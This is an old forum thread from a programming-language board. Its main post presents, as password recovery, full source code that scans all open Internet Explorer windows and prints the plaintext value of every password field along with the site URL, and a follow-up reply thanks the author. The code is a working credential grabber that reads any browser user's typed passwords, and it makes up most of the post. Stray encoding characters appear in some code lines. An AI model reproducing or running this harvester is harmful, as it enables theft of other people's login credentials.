Text only | Text with Images

IonicWind Software

Aurora Compiler => Tips and Tricks => Topic started by: sapero on September 08, 2006, 01:20:46 PM

Title: How to grab a password
Post by: sapero on September 08, 2006, 01:20:46 PM
A man can forget. If you allow a cookie and autocomplete passwords for favorite forum like ionicwind, you can forget the password.
You can always run third party software for password recovery (check site nirsoft.net), but you don't know how it works!

Code Select
// compile for console

// this example enumerates all passwords from all opened standard 'HTML' windows
#include "EnumHtmlPasswords.inc"
declare *ObjectFromLresult(int lResult, GUID* riid, int wParam, void* ppvObject),int;
int g_pwsFound;


global sub main()
{
ObjectFromLresult = GetProcAddress(LoadLibrary("oleacc.dll"), "ObjectFromLresult");
if (!ObjectFromLresult)
{
print("sorry, oleacc.dll::ObjectFromLresult not found"); return _getch();
}
SetGuid(&_IID_IHTMLInputElement, 810612178,298817717,-1442807109,198098176);

print("open any site, go to login, and type any password\nthen press any key to continue\n>",);
_getch();
print("\n\n");

UINT nMsg = RegisterWindowMessage("WM_HTML_GETOBJECT");

CoInitialize(NULL);
EnumChildWindows(GetDesktopWindow(), &EnumWindowsProc, nMsg);
CoUninitialize();


print("\n\nfinished.");
if (!g_pwsFound) print("no passwords found");
_getch();
}



sub EnumWindowsProc(int hwnd, int nMsg),BOOL
{
dstring classname[64];
classname[0] = 0;
GetClassName(hwnd, &classname, 64);

if (classname == "Internet Explorer_Server")
{
DWORD dwResult;
IHTMLDocument2 *spDoc;
SendMessageTimeout(hwnd, nMsg, 0, 0, SMTO_ABORTIFHUNG, 1000, &dwResult);

if (!ObjectFromLresult(dwResult, _IID_IHTMLDocument2, 0, &spDoc ))
{
wstring* bstrUrl = null;
if (!spDoc->get_URL(&bstrUrl) && (bstrUrl))
{
print("---------------\nsite: ", w2s(*(wstring)bstrUrl));
SysFreeString(bstrUrl);
}
EnumPasswords(spDoc);
spDoc->Release();
}
}
return true; // continue enumerating
}




sub EnumPasswords(IHTMLDocument2 *spDoc)
{
IHTMLElementCollection *pColl = null;
if (!spDoc->get_all(&pColl) && (pColl))ÂÃ,  ÂÃ, // document.all
{
VARIANT vTag;
vTag.vt = VT_BSTR;
vTag.bstrVal = SysAllocString(L"INPUT");
IDispatch *pdisp = null;
if (!pColl->tags(vTag, &pdisp) && (pdisp))ÂÃ,  // element = document.all.tags("INPUT")
{
IHTMLElementCollection *pInputCollection;
if (!pdisp->QueryInterface(_IID_IHTMLElementCollection, &pInputCollection))
{
VARIANT vName, vIndex;
vName.vt = VT_I4; vIndex.vt = VT_EMPTY;
LONG count = 0;
pInputCollection->get_length(&count);
for (vName.intVal=0; vName.intVal<count; vName.intVal++)
{
IDispatch *pInputdisp = null;
if (!pInputCollection->item(vName, vIndex, &pInputdisp) && (pInputdisp))ÂÃ,  // element[index]
{
IHTMLInputElement *input;
if (!pInputdisp->QueryInterface(_IID_IHTMLInputElement, &input))
{
wstring* bstrType = null;
if (!input->get_type(&bstrType) && (bstrType))ÂÃ,  // if element[index].type = "password"
{
if (*(wstring)bstrType == L"password")
{
wstring* bstrPassword = null;
if (!input->get_value(&bstrPassword) && (bstrPassword))
{
g_pwsFound++;
print(" - password: ",w2s(*(wstring)bstrPassword));ÂÃ,  // print element[index].value
SysFreeString(bstrPassword);
}
}
SysFreeString(bstrType);
}
input->Release();
}
pInputdisp->Release();
}
}
pInputCollection->Release();
}
}
SysFreeString(vTag.bstrVal);
}
}

include attached:
Title: Re: How to grab a password
Post by: kryton9 on September 08, 2006, 11:01:11 PM
Sapero, you are coming up with really cool stuff. Thanks for sharing.
I am amazed with all the neat things you write and how you ever figure all of this out is beyond me.
This goes for your other examples too, I just didn't want to write the same message on all of them.

Thanks.
Text only | Text with Images